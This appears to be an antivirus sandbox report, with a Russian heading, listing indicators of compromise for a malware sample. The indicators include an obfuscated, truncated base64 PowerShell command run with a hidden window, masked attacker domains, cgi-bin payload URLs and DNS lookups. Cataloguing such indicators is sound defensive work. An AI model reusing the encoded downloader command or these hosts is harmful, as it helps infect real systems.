Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSADMAOQAxADIAOAA9ACcAZAA3ADgAMAA3ADkAMgAnADsAJABGADAANABfAF8ANAAgAD0AIAAnADQANAA4ACcAOwAkAGEANQA3ADAANAA0ADUAOAA9ACcAWQA5AF8ANwBfADMANgA5ACcAOwAkAHAAMAAzADQAMQA4ADYAPQAkAGUAbgB2ADoAdQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1536
- %TEMP%\866663.cvr
- 'th#####englishgame.com':80
- 'sa####rimavera.by':80
- 'my#####hyappshop.com':80
- http://th#####englishgame.com/cgi-bin/be91s_6q9sap4k-2611554/
- http://www.th#####englishgame.com/cgi-bin/be91s_6q9sap4k-2611554/
- http://my#####hyappshop.com/au13/fNxUUWSMj/
- DNS ASK dz###bukiet.com
- DNS ASK th#####englishgame.com
- DNS ASK sa####rimavera.by
- DNS ASK my#####hyappshop.com
- DNS ASK sa####et-zarzis.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSADMAOQAxADIAOAA9ACcAZAA3ADgAMAA3ADkAMgAnADsAJABGADAANABfAF8ANAAgAD0AIAAnADQANAA4ACcAOwAkAGEANQA3ADAANAA0ADUAOAA9ACcAWQA5AF8ANwBfADMANgA5ACcAOwAkAHAAMAAzADQAMQA4ADYAPQAkAGUAbgB2ADoAdQB...' (со скрытым окном)